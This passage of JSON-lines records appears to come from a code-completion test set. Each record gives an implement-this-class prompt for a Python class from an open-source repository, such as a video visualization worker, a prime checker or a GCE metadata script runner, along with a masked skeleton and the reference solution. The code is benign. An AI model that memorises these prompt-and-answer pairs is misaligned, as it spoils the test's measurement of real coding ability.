super().__init__()\n<|end_body_0|>\n\n<|body_start_1|>\n while True:\n task = self.task_queue.get()\n if isinstance(task, _StopToken):\n break\n frames = draw_predictions(task, self.video_vis)\n task.frames = np.array(frames)\n self.result_queue.put(task)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "_VisWorker", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass _VisWorker:\n\n def __init__(self, video_vis, task_queue, result_queue):\n \"\"\"Visualization Worker for AsyncVis. Args: video_vis (VideoVisualizer object): object with tools for visualization. task_queue (mp.Queue): a shared queue for incoming tasks for visualization. 
result_queue (mp.Queue): a shared queue for visualized results.\"\"\"\n <|body_0|>\n\n def run(self):\n \"\"\"Run visualization asynchronously.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.video_vis = video_vis\n self.task_queue = task_queue\n self.result_queue = result_queue\n super().__init__()\n<|end_body_0|>\n\n<|body_start_1|>\n while True:\n task = self.task_queue.get()\n if isinstance(task, _StopToken):\n break\n frames = draw_predictions(task, self.video_vis)\n task.frames = np.array(frames)\n self.result_queue.put(task)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000148", "length_bytes": 9808, "license_type": "permissive", "methods": [{"docstring": "Visualization Worker for AsyncVis. Args: video_vis (VideoVisualizer object): object with tools for visualization. task_queue (mp.Queue): a shared queue for incoming tasks for visualization. result_queue (mp.Queue): a shared queue for visualized results.", "name": "__init__", "signature": "def __init__(self, video_vis, task_queue, result_queue)"}, {"docstring": "Run visualization asynchronously.", "name": "run", "signature": "def run(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006655", "prompt": "Implement the Python class `_VisWorker` described below.\n\nClass description:\nImplement the _VisWorker class.\n\nMethod signatures and docstrings:\n- def __init__(self, video_vis, task_queue, result_queue): Visualization Worker for AsyncVis. Args: video_vis (VideoVisualizer object): object with tools for visualization. task_queue (mp.Queue): a shared queue for incoming tasks for visualization. result_queue (mp.Queue): a shared queue for visualized results.\n- def run(self): Run visualization asynchronously.", "prompted_full_text": "Implement the Python class `_VisWorker` described below.\n\nClass description:\nImplement the _VisWorker class.\n\nMethod signatures and docstrings:\n- def __init__(self, video_vis, task_queue, result_queue): Visualization Worker for AsyncVis. Args: video_vis (VideoVisualizer object): object with tools for visualization. task_queue (mp.Queue): a shared queue for incoming tasks for visualization. result_queue (mp.Queue): a shared queue for visualized results.\n- def run(self): Run visualization asynchronously.\n\n<|skeleton|>\nclass _VisWorker:\n\n def __init__(self, video_vis, task_queue, result_queue):\n \"\"\"Visualization Worker for AsyncVis. Args: video_vis (VideoVisualizer object): object with tools for visualization. task_queue (mp.Queue): a shared queue for incoming tasks for visualization. result_queue (mp.Queue): a shared queue for visualized results.\"\"\"\n <|body_0|>\n\n def run(self):\n \"\"\"Run visualization asynchronously.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.video_vis = video_vis\n self.task_queue = task_queue\n self.result_queue = result_queue\n super().__init__()\n<|end_body_0|>\n\n<|body_start_1|>\n while True:\n task = self.task_queue.get()\n if isinstance(task, _StopToken):\n break\n frames = draw_predictions(task, self.video_vis)\n task.frames = np.array(frames)\n self.result_queue.put(task)\n<|end_body_1|>\n", "revision_id": "6092dad7be32bb1d6b71fe1bade258dc8b492fe3", "skeleton": "<|skeleton|>\nclass _VisWorker:\n\n def __init__(self, video_vis, task_queue, result_queue):\n \"\"\"Visualization Worker for AsyncVis. Args: video_vis (VideoVisualizer object): object with tools for visualization. task_queue (mp.Queue): a shared queue for incoming tasks for visualization. 
result_queue (mp.Queue): a shared queue for visualized results.\"\"\"\n <|body_0|>\n\n def run(self):\n \"\"\"Run visualization asynchronously.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class _VisWorker:\n def __init__(self, video_vis, task_queue, result_queue):\n \"\"\"Visualization Worker for AsyncVis. Args: video_vis (VideoVisualizer object): object with tools for visualization. task_queue (mp.Queue): a shared queue for incoming tasks for visualization. result_queue (mp.Queue): a shared queue for visualized results.\"\"\"\n self.video_vis = video_vis\n self.task_queue = task_queue\n self.result_queue = result_queue\n super().__init__()\n\n def run(self):\n \"\"\"Run visualization asynchronously.\"\"\"\n while True:\n task = self.task_queue.get()\n if isinstance(task, _StopToken):\n break\n frames = draw_predictions(task, self.video_vis)\n task.frames = np.array(frames)\n self.result_queue.put(task)\n", "source": "the_stack_v2_python_sparse", "source_path": "slowfast/visualization/async_predictor.py", "source_repo": "facebookresearch/SlowFast", "split": "test", "star_events_count": 6221} {"blob_id": "1f8a744a0c5495ded77df7737fd33081dcbf90e7", "bodies": ["filing_effective_date = filing_effective_date.replace(tzinfo=None)\nregistrar = [x for x in RegistrarInfo.registrar_info if filing_effective_date >= datetime.datetime.strptime(x['startDate'], '%Y-%m-%dT%H:%M:%S') and (x['endDate'] is None or filing_effective_date <= datetime.datetime.strptime(x['endDate'], '%Y-%m-%dT%H:%M:%S'))][0]\nsignature = RegistrarInfo.encode_registrar_signature(registrar['signatureImage'])\nregistrar['signature'] = f'data:image/png;base64,{signature}'\nif registrar['signatureImageAndText']:\n signature_and_text = RegistrarInfo.encode_registrar_signature(registrar['signatureImageAndText'])\n registrar['signatureAndText'] = f'data:image/png;base64,{signature_and_text}'\nreturn registrar", "template_path = current_app.config.get('REPORT_TEMPLATE_PATH')\nimage_path = f'{template_path}/registrar_signatures/{signature_image}'\nwith open(image_path, 'rb') as image_file:\n encoded_string = base64.b64encode(image_file.read())\n return encoded_string.decode('utf-8')"], "bodies_text": "<|body_start_0|>\n filing_effective_date = filing_effective_date.replace(tzinfo=None)\n registrar = [x for x in RegistrarInfo.registrar_info if filing_effective_date >= datetime.datetime.strptime(x['startDate'], '%Y-%m-%dT%H:%M:%S') and (x['endDate'] is None or filing_effective_date <= datetime.datetime.strptime(x['endDate'], '%Y-%m-%dT%H:%M:%S'))][0]\n signature = RegistrarInfo.encode_registrar_signature(registrar['signatureImage'])\n registrar['signature'] = f'data:image/png;base64,{signature}'\n if registrar['signatureImageAndText']:\n signature_and_text = RegistrarInfo.encode_registrar_signature(registrar['signatureImageAndText'])\n registrar['signatureAndText'] = f'data:image/png;base64,{signature_and_text}'\n return registrar\n<|end_body_0|>\n\n<|body_start_1|>\n template_path = current_app.config.get('REPORT_TEMPLATE_PATH')\n image_path = f'{template_path}/registrar_signatures/{signature_image}'\n with open(image_path, 'rb') as image_file:\n encoded_string = base64.b64encode(image_file.read())\n return encoded_string.decode('utf-8')\n<|end_body_1|>\n", "class_docstring": "Utility to get the relevant registrar info for a filing.", "class_name": "RegistrarInfo", "detected_licenses": ["Apache-2.0"], "format_version": 
"stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass RegistrarInfo:\n \"\"\"Utility to get the relevant registrar info for a filing.\"\"\"\n\n def get_registrar_info(filing_effective_date) -> dict:\n \"\"\"Return the registrar for a filing.\"\"\"\n <|body_0|>\n\n def encode_registrar_signature(signature_image) -> str:\n \"\"\"Return the encoded registrar signature.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n filing_effective_date = filing_effective_date.replace(tzinfo=None)\n registrar = [x for x in RegistrarInfo.registrar_info if filing_effective_date >= datetime.datetime.strptime(x['startDate'], '%Y-%m-%dT%H:%M:%S') and (x['endDate'] is None or filing_effective_date <= datetime.datetime.strptime(x['endDate'], '%Y-%m-%dT%H:%M:%S'))][0]\n signature = RegistrarInfo.encode_registrar_signature(registrar['signatureImage'])\n registrar['signature'] = f'data:image/png;base64,{signature}'\n if registrar['signatureImageAndText']:\n signature_and_text = RegistrarInfo.encode_registrar_signature(registrar['signatureImageAndText'])\n registrar['signatureAndText'] = f'data:image/png;base64,{signature_and_text}'\n return registrar\n<|end_body_0|>\n\n<|body_start_1|>\n template_path = current_app.config.get('REPORT_TEMPLATE_PATH')\n image_path = f'{template_path}/registrar_signatures/{signature_image}'\n with open(image_path, 'rb') as image_file:\n encoded_string = base64.b64encode(image_file.read())\n return encoded_string.decode('utf-8')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000149", "length_bytes": 3514, "license_type": "permissive", "methods": [{"docstring": "Return the registrar for a filing.", "name": "get_registrar_info", "signature": "def get_registrar_info(filing_effective_date) -> dict"}, {"docstring": "Return the encoded registrar signature.", "name": "encode_registrar_signature", "signature": "def encode_registrar_signature(signature_image) -> str"}], "n_methods": 2, "prompt": "Implement the Python class `RegistrarInfo` described below.\n\nClass description:\nUtility to get the relevant registrar info for a filing.\n\nMethod signatures and docstrings:\n- def get_registrar_info(filing_effective_date) -> dict: Return the registrar for a filing.\n- def encode_registrar_signature(signature_image) -> str: Return the encoded registrar signature.", "prompted_full_text": "Implement the Python class `RegistrarInfo` described below.\n\nClass description:\nUtility to get the relevant registrar info for a filing.\n\nMethod signatures and docstrings:\n- def get_registrar_info(filing_effective_date) -> dict: Return the registrar for a filing.\n- def encode_registrar_signature(signature_image) -> str: Return the encoded registrar signature.\n\n<|skeleton|>\nclass RegistrarInfo:\n \"\"\"Utility to get the relevant registrar info for a filing.\"\"\"\n\n def get_registrar_info(filing_effective_date) -> dict:\n \"\"\"Return the registrar for a filing.\"\"\"\n <|body_0|>\n\n def encode_registrar_signature(signature_image) -> str:\n \"\"\"Return the encoded registrar signature.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n filing_effective_date = filing_effective_date.replace(tzinfo=None)\n registrar = [x for x in RegistrarInfo.registrar_info if filing_effective_date >= datetime.datetime.strptime(x['startDate'], '%Y-%m-%dT%H:%M:%S') and (x['endDate'] is None or filing_effective_date <= datetime.datetime.strptime(x['endDate'], '%Y-%m-%dT%H:%M:%S'))][0]\n signature = RegistrarInfo.encode_registrar_signature(registrar['signatureImage'])\n 
registrar['signature'] = f'data:image/png;base64,{signature}'\n if registrar['signatureImageAndText']:\n signature_and_text = RegistrarInfo.encode_registrar_signature(registrar['signatureImageAndText'])\n registrar['signatureAndText'] = f'data:image/png;base64,{signature_and_text}'\n return registrar\n<|end_body_0|>\n\n<|body_start_1|>\n template_path = current_app.config.get('REPORT_TEMPLATE_PATH')\n image_path = f'{template_path}/registrar_signatures/{signature_image}'\n with open(image_path, 'rb') as image_file:\n encoded_string = base64.b64encode(image_file.read())\n return encoded_string.decode('utf-8')\n<|end_body_1|>\n", "revision_id": "d90f11a7b14411b02c07fe97d2c1fc31cd4a9b32", "skeleton": "<|skeleton|>\nclass RegistrarInfo:\n \"\"\"Utility to get the relevant registrar info for a filing.\"\"\"\n\n def get_registrar_info(filing_effective_date) -> dict:\n \"\"\"Return the registrar for a filing.\"\"\"\n <|body_0|>\n\n def encode_registrar_signature(signature_image) -> str:\n \"\"\"Return the encoded registrar signature.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class RegistrarInfo:\n \"\"\"Utility to get the relevant registrar info for a filing.\"\"\"\n\n def get_registrar_info(filing_effective_date) -> dict:\n \"\"\"Return the registrar for a filing.\"\"\"\n filing_effective_date = filing_effective_date.replace(tzinfo=None)\n registrar = [x for x in RegistrarInfo.registrar_info if filing_effective_date >= datetime.datetime.strptime(x['startDate'], '%Y-%m-%dT%H:%M:%S') and (x['endDate'] is None or filing_effective_date <= datetime.datetime.strptime(x['endDate'], '%Y-%m-%dT%H:%M:%S'))][0]\n signature = RegistrarInfo.encode_registrar_signature(registrar['signatureImage'])\n registrar['signature'] = f'data:image/png;base64,{signature}'\n if registrar['signatureImageAndText']:\n signature_and_text = RegistrarInfo.encode_registrar_signature(registrar['signatureImageAndText'])\n registrar['signatureAndText'] = f'data:image/png;base64,{signature_and_text}'\n return registrar\n\n def encode_registrar_signature(signature_image) -> str:\n \"\"\"Return the encoded registrar signature.\"\"\"\n template_path = current_app.config.get('REPORT_TEMPLATE_PATH')\n image_path = f'{template_path}/registrar_signatures/{signature_image}'\n with open(image_path, 'rb') as image_file:\n encoded_string = base64.b64encode(image_file.read())\n return encoded_string.decode('utf-8')\n", "source": "the_stack_v2_python_sparse", "source_path": "legal-api/src/legal_api/reports/registrar_meta.py", "source_repo": "bcgov/lear", "split": "test", "star_events_count": 13} {"blob_id": "85f6893ae854200ee989d5b43f217b37f645c7ba", "bodies": ["if number in (0, 1):\n return False\nif number < 0:\n return False\nfor element in range(2, number):\n if number % element == 0:\n return False\nreturn True", "index = number\nwhile True:\n index += 1\n if self.is_prime(index):\n print('The next prime after {0} is {1}'.format(number, index))\n return index"], "bodies_text": "<|body_start_0|>\n if number in (0, 1):\n return False\n if number < 0:\n return False\n for element in range(2, number):\n if number % element == 0:\n return False\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n index = number\n while True:\n index += 1\n if self.is_prime(index):\n print('The next prime after {0} is {1}'.format(number, index))\n return index\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Prime", "detected_licenses": 
[], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Prime:\n\n def is_prime(self, number):\n \"\"\"Return True if *number* is prime.\"\"\"\n <|body_0|>\n\n def print_next_prime(self, number):\n \"\"\"Print the closest prime number larger than *number*.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if number in (0, 1):\n return False\n if number < 0:\n return False\n for element in range(2, number):\n if number % element == 0:\n return False\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n index = number\n while True:\n index += 1\n if self.is_prime(index):\n print('The next prime after {0} is {1}'.format(number, index))\n return index\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000150", "length_bytes": 793, "license_type": "no_license", "methods": [{"docstring": "Return True if *number* is prime.", "name": "is_prime", "signature": "def is_prime(self, number)"}, {"docstring": "Print the closest prime number larger than *number*.", "name": "print_next_prime", "signature": "def print_next_prime(self, number)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000939", "prompt": "Implement the Python class `Prime` described below.\n\nClass description:\nImplement the Prime class.\n\nMethod signatures and docstrings:\n- def is_prime(self, number): Return True if *number* is prime.\n- def print_next_prime(self, number): Print the closest prime number larger than *number*.", "prompted_full_text": "Implement the Python class `Prime` described below.\n\nClass description:\nImplement the Prime class.\n\nMethod signatures and docstrings:\n- def is_prime(self, number): Return True if *number* is prime.\n- def print_next_prime(self, number): Print the closest prime number larger than *number*.\n\n<|skeleton|>\nclass Prime:\n\n def is_prime(self, number):\n \"\"\"Return True if *number* is prime.\"\"\"\n <|body_0|>\n\n def print_next_prime(self, number):\n \"\"\"Print the closest prime number larger than *number*.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if number in (0, 1):\n return False\n if number < 0:\n return False\n for element in range(2, number):\n if number % element == 0:\n return False\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n index = number\n while True:\n index += 1\n if self.is_prime(index):\n print('The next prime after {0} is {1}'.format(number, index))\n return index\n<|end_body_1|>\n", "revision_id": "2965199d439b5cf4d9074f9c43240bef457218f4", "skeleton": "<|skeleton|>\nclass Prime:\n\n def is_prime(self, number):\n \"\"\"Return True if *number* is prime.\"\"\"\n <|body_0|>\n\n def print_next_prime(self, number):\n \"\"\"Print the closest prime number larger than *number*.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Prime:\n def is_prime(self, number):\n \"\"\"Return True if *number* is prime.\"\"\"\n if number in (0, 1):\n return False\n if number < 0:\n return False\n for element in range(2, number):\n if number % element == 0:\n return False\n return True\n\n def print_next_prime(self, number):\n \"\"\"Print the closest prime number larger than *number*.\"\"\"\n index = number\n while True:\n index += 1\n if self.is_prime(index):\n print('The next prime after {0} is {1}'.format(number, index))\n return index\n", "source": "the_stack_v2_python_sparse", "source_path": "python_overview/python_unit_testing/primes.py", "source_repo": 
"truas/kccs", "split": "test", "star_events_count": 0} {"blob_id": "9e4eae77ec00fe1fcb0cf779812c6172876b0031", "bodies": ["self.script_type = script_type\nself.default_shell = default_shell\nname = '%s-script' % self.script_type\nfacility = logging.handlers.SysLogHandler.LOG_DAEMON\nself.logger = logger.Logger(name=name, debug=debug, facility=facility)\nself.retriever = script_retriever.ScriptRetriever(self.logger, script_type)\nself.executor = script_executor.ScriptExecutor(self.logger, script_type, default_shell=default_shell)\nself._RunScripts(run_dir=run_dir)", "with _CreateTempDir(self.script_type, run_dir=run_dir) as dest_dir:\n try:\n self.logger.info('Starting %s scripts.', self.script_type)\n script_dict = self.retriever.GetScripts(dest_dir)\n self.executor.RunScripts(script_dict)\n finally:\n self.logger.info('Finished running %s scripts.', self.script_type)"], "bodies_text": "<|body_start_0|>\n self.script_type = script_type\n self.default_shell = default_shell\n name = '%s-script' % self.script_type\n facility = logging.handlers.SysLogHandler.LOG_DAEMON\n self.logger = logger.Logger(name=name, debug=debug, facility=facility)\n self.retriever = script_retriever.ScriptRetriever(self.logger, script_type)\n self.executor = script_executor.ScriptExecutor(self.logger, script_type, default_shell=default_shell)\n self._RunScripts(run_dir=run_dir)\n<|end_body_0|>\n\n<|body_start_1|>\n with _CreateTempDir(self.script_type, run_dir=run_dir) as dest_dir:\n try:\n self.logger.info('Starting %s scripts.', self.script_type)\n script_dict = self.retriever.GetScripts(dest_dir)\n self.executor.RunScripts(script_dict)\n finally:\n self.logger.info('Finished running %s scripts.', self.script_type)\n<|end_body_1|>\n", "class_docstring": "A class for retrieving and executing metadata scripts.", "class_name": "ScriptManager", "detected_licenses": ["LicenseRef-scancode-generic-cla", "Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ScriptManager:\n \"\"\"A class for retrieving and executing metadata scripts.\"\"\"\n\n def __init__(self, script_type, default_shell=None, run_dir=None, debug=False):\n \"\"\"Constructor. Args: script_type: string, the metadata script type to run. default_shell: string, the default shell to execute the script. run_dir: string, the base directory location of the temporary directory. debug: bool, True if debug output should write to the console.\"\"\"\n <|body_0|>\n\n def _RunScripts(self, run_dir=None):\n \"\"\"Retrieve metadata scripts and execute them. 
Args: run_dir: string, the base directory location of the temporary directory.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.script_type = script_type\n self.default_shell = default_shell\n name = '%s-script' % self.script_type\n facility = logging.handlers.SysLogHandler.LOG_DAEMON\n self.logger = logger.Logger(name=name, debug=debug, facility=facility)\n self.retriever = script_retriever.ScriptRetriever(self.logger, script_type)\n self.executor = script_executor.ScriptExecutor(self.logger, script_type, default_shell=default_shell)\n self._RunScripts(run_dir=run_dir)\n<|end_body_0|>\n\n<|body_start_1|>\n with _CreateTempDir(self.script_type, run_dir=run_dir) as dest_dir:\n try:\n self.logger.info('Starting %s scripts.', self.script_type)\n script_dict = self.retriever.GetScripts(dest_dir)\n self.executor.RunScripts(script_dict)\n finally:\n self.logger.info('Finished running %s scripts.', self.script_type)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000151", "length_bytes": 4004, "license_type": "permissive", "methods": [{"docstring": "Constructor. Args: script_type: string, the metadata script type to run. default_shell: string, the default shell to execute the script. run_dir: string, the base directory location of the temporary directory. debug: bool, True if debug output should write to the console.", "name": "__init__", "signature": "def __init__(self, script_type, default_shell=None, run_dir=None, debug=False)"}, {"docstring": "Retrieve metadata scripts and execute them. Args: run_dir: string, the base directory location of the temporary directory.", "name": "_RunScripts", "signature": "def _RunScripts(self, run_dir=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_004498", "prompt": "Implement the Python class `ScriptManager` described below.\n\nClass description:\nA class for retrieving and executing metadata scripts.\n\nMethod signatures and docstrings:\n- def __init__(self, script_type, default_shell=None, run_dir=None, debug=False): Constructor. Args: script_type: string, the metadata script type to run. default_shell: string, the default shell to execute the script. run_dir: string, the base directory location of the temporary directory. debug: bool, True if debug output should write to the console.\n- def _RunScripts(self, run_dir=None): Retrieve metadata scripts and execute them. Args: run_dir: string, the base directory location of the temporary directory.", "prompted_full_text": "Implement the Python class `ScriptManager` described below.\n\nClass description:\nA class for retrieving and executing metadata scripts.\n\nMethod signatures and docstrings:\n- def __init__(self, script_type, default_shell=None, run_dir=None, debug=False): Constructor. Args: script_type: string, the metadata script type to run. default_shell: string, the default shell to execute the script. run_dir: string, the base directory location of the temporary directory. debug: bool, True if debug output should write to the console.\n- def _RunScripts(self, run_dir=None): Retrieve metadata scripts and execute them. Args: run_dir: string, the base directory location of the temporary directory.\n\n<|skeleton|>\nclass ScriptManager:\n \"\"\"A class for retrieving and executing metadata scripts.\"\"\"\n\n def __init__(self, script_type, default_shell=None, run_dir=None, debug=False):\n \"\"\"Constructor. Args: script_type: string, the metadata script type to run. default_shell: string, the default shell to execute the script. 
run_dir: string, the base directory location of the temporary directory. debug: bool, True if debug output should write to the console.\"\"\"\n <|body_0|>\n\n def _RunScripts(self, run_dir=None):\n \"\"\"Retrieve metadata scripts and execute them. Args: run_dir: string, the base directory location of the temporary directory.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.script_type = script_type\n self.default_shell = default_shell\n name = '%s-script' % self.script_type\n facility = logging.handlers.SysLogHandler.LOG_DAEMON\n self.logger = logger.Logger(name=name, debug=debug, facility=facility)\n self.retriever = script_retriever.ScriptRetriever(self.logger, script_type)\n self.executor = script_executor.ScriptExecutor(self.logger, script_type, default_shell=default_shell)\n self._RunScripts(run_dir=run_dir)\n<|end_body_0|>\n\n<|body_start_1|>\n with _CreateTempDir(self.script_type, run_dir=run_dir) as dest_dir:\n try:\n self.logger.info('Starting %s scripts.', self.script_type)\n script_dict = self.retriever.GetScripts(dest_dir)\n self.executor.RunScripts(script_dict)\n finally:\n self.logger.info('Finished running %s scripts.', self.script_type)\n<|end_body_1|>\n", "revision_id": "cf4b33214f770da2299923a5fa73d3d95f66ec35", "skeleton": "<|skeleton|>\nclass ScriptManager:\n \"\"\"A class for retrieving and executing metadata scripts.\"\"\"\n\n def __init__(self, script_type, default_shell=None, run_dir=None, debug=False):\n \"\"\"Constructor. Args: script_type: string, the metadata script type to run. default_shell: string, the default shell to execute the script. run_dir: string, the base directory location of the temporary directory. debug: bool, True if debug output should write to the console.\"\"\"\n <|body_0|>\n\n def _RunScripts(self, run_dir=None):\n \"\"\"Retrieve metadata scripts and execute them. Args: run_dir: string, the base directory location of the temporary directory.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ScriptManager:\n \"\"\"A class for retrieving and executing metadata scripts.\"\"\"\n\n def __init__(self, script_type, default_shell=None, run_dir=None, debug=False):\n \"\"\"Constructor. Args: script_type: string, the metadata script type to run. default_shell: string, the default shell to execute the script. run_dir: string, the base directory location of the temporary directory. debug: bool, True if debug output should write to the console.\"\"\"\n self.script_type = script_type\n self.default_shell = default_shell\n name = '%s-script' % self.script_type\n facility = logging.handlers.SysLogHandler.LOG_DAEMON\n self.logger = logger.Logger(name=name, debug=debug, facility=facility)\n self.retriever = script_retriever.ScriptRetriever(self.logger, script_type)\n self.executor = script_executor.ScriptExecutor(self.logger, script_type, default_shell=default_shell)\n self._RunScripts(run_dir=run_dir)\n\n def _RunScripts(self, run_dir=None):\n \"\"\"Retrieve metadata scripts and execute them. 
Args: run_dir: string, the base directory location of the temporary directory.\"\"\"\n with _CreateTempDir(self.script_type, run_dir=run_dir) as dest_dir:\n try:\n self.logger.info('Starting %s scripts.', self.script_type)\n script_dict = self.retriever.GetScripts(dest_dir)\n self.executor.RunScripts(script_dict)\n finally:\n self.logger.info('Finished running %s scripts.', self.script_type)\n", "source": "the_stack_v2_python_sparse", "source_path": "packages/python-google-compute-engine/google_compute_engine/metadata_scripts/script_manager.py", "source_repo": "GoogleCloudPlatform/compute-image-packages", "split": "test", "star_events_count": 329} {"blob_id": "9fe18658a43d2b99dd84819b1e9aa2b603f41a22", "bodies": ["super(CollaQSMACAttentionModule, self).__init__()\nself.self_feature_range = self_feature_range\nself.ally_feature_range = ally_feature_range\nself.attention_layer = CollaQMultiHeadAttention(1, q_dim, v_dim, attention_size, attention_size, attention_size)", "self_features = obs[:, :, :, self.self_feature_range[0]:self.self_feature_range[1]]\nally_features = obs[:, :, :, self.ally_feature_range[0]:self.ally_feature_range[1]]\nreturn (self_features, ally_features)", "obs = inputs\nself_features, ally_features = self._cut_obs(obs)\nT, B, A, _ = self_features.shape\nself_features = self_features.reshape(T * B * A, 1, -1)\nally_features = ally_features.reshape(T * B * A, A - 1, -1)\nself_features, ally_features = self.attention_layer(self_features, ally_features, ally_features)\nself_features = self_features.reshape(T, B, A, -1)\nally_features = ally_features.reshape(T, B, A, -1)\nobs = torch.cat([obs[:, :, :, :self.self_feature_range[0]], self_features, ally_features, obs[:, :, :, self.ally_feature_range[1]:]], dim=-1)\nreturn obs"], "bodies_text": "<|body_start_0|>\n super(CollaQSMACAttentionModule, self).__init__()\n self.self_feature_range = self_feature_range\n self.ally_feature_range = ally_feature_range\n self.attention_layer = CollaQMultiHeadAttention(1, q_dim, v_dim, attention_size, attention_size, attention_size)\n<|end_body_0|>\n\n<|body_start_1|>\n self_features = obs[:, :, :, self.self_feature_range[0]:self.self_feature_range[1]]\n ally_features = obs[:, :, :, self.ally_feature_range[0]:self.ally_feature_range[1]]\n return (self_features, ally_features)\n<|end_body_1|>\n\n<|body_start_2|>\n obs = inputs\n self_features, ally_features = self._cut_obs(obs)\n T, B, A, _ = self_features.shape\n self_features = self_features.reshape(T * B * A, 1, -1)\n ally_features = ally_features.reshape(T * B * A, A - 1, -1)\n self_features, ally_features = self.attention_layer(self_features, ally_features, ally_features)\n self_features = self_features.reshape(T, B, A, -1)\n ally_features = ally_features.reshape(T, B, A, -1)\n obs = torch.cat([obs[:, :, :, :self.self_feature_range[0]], self_features, ally_features, obs[:, :, :, self.ally_feature_range[1]:]], dim=-1)\n return obs\n<|end_body_2|>\n", "class_docstring": "Overview: Collaq attention module. Used to get agent's attention observation. It includes agent's observation and agent's part of the observation information of the agent's concerned allies Interface: __init__, _cut_obs, forward", "class_name": "CollaQSMACAttentionModule", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass CollaQSMACAttentionModule:\n \"\"\"Overview: Collaq attention module. Used to get agent's attention observation. 
It includes agent's observation and agent's part of the observation information of the agent's concerned allies Interface: __init__, _cut_obs, forward\"\"\"\n\n def __init__(self, q_dim: int, v_dim: int, self_feature_range: List[int], ally_feature_range: List[int], attention_size: int):\n \"\"\"Overview: initialize collaq attention module Arguments: - q_dim (:obj:`int`): the dimension of transformer output q - v_dim (:obj:`int`): the dimension of transformer output v - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation - attention_size (:obj:`int`): the size of attention net layer\"\"\"\n <|body_0|>\n\n def _cut_obs(self, obs: torch.Tensor):\n \"\"\"Overview: cut the observed information into self's observation and ally's observation Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation\"\"\"\n <|body_1|>\n\n def forward(self, inputs: torch.Tensor):\n \"\"\"Overview: forward computation to get agent's attention observation information Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - obs (:obj:`torch.Tensor`): output agent's attention observation\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(CollaQSMACAttentionModule, self).__init__()\n self.self_feature_range = self_feature_range\n self.ally_feature_range = ally_feature_range\n self.attention_layer = CollaQMultiHeadAttention(1, q_dim, v_dim, attention_size, attention_size, attention_size)\n<|end_body_0|>\n\n<|body_start_1|>\n self_features = obs[:, :, :, self.self_feature_range[0]:self.self_feature_range[1]]\n ally_features = obs[:, :, :, self.ally_feature_range[0]:self.ally_feature_range[1]]\n return (self_features, ally_features)\n<|end_body_1|>\n\n<|body_start_2|>\n obs = inputs\n self_features, ally_features = self._cut_obs(obs)\n T, B, A, _ = self_features.shape\n self_features = self_features.reshape(T * B * A, 1, -1)\n ally_features = ally_features.reshape(T * B * A, A - 1, -1)\n self_features, ally_features = self.attention_layer(self_features, ally_features, ally_features)\n self_features = self_features.reshape(T, B, A, -1)\n ally_features = ally_features.reshape(T, B, A, -1)\n obs = torch.cat([obs[:, :, :, :self.self_feature_range[0]], self_features, ally_features, obs[:, :, :, self.ally_feature_range[1]:]], dim=-1)\n return obs\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000152", "length_bytes": 27383, "license_type": "permissive", "methods": [{"docstring": "Overview: initialize collaq attention module Arguments: - q_dim (:obj:`int`): the dimension of transformer output q - v_dim (:obj:`int`): the dimension of transformer output v - self_features (:obj:`torch.Tensor`): output self agent's attention observation - ally_features (:obj:`torch.Tensor`): output ally agent's attention observation - attention_size (:obj:`int`): the size of attention net layer", "name": "__init__", "signature": "def __init__(self, q_dim: int, v_dim: int, self_feature_range: List[int], ally_feature_range: List[int], attention_size: int)"}, {"docstring": "Overview: cut the observed information into self's observation and ally's observation Arguments: - obs (:obj:`torch.Tensor`): input each agent's observation Return: - self_features (:obj:`torch.Tensor`): output self agent's attention 
